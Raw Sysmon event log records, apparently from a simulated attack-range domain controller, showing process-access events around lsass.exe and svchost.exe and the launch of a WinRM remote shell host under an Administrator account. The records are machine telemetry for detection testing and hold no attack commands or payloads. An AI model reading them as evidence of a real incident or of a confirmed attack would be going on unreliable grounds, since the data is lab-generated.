13:54:41.723{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004469Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.723{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004468Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.723{10ACEC4A-8541-5FCF-1500-000000009101}13641444C:\Windows\system32\svchost.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000004467Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.723{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004466Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.707{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004465Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.707{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004464Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004463Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004462Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004461Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004460Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004459Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004458Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004457Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004456Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004455Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004454Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004453Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.705{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000004452Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004451Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004450Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.691{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004449Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.629{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004448Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.629{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004447Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.629{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004446Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.613{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004445Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 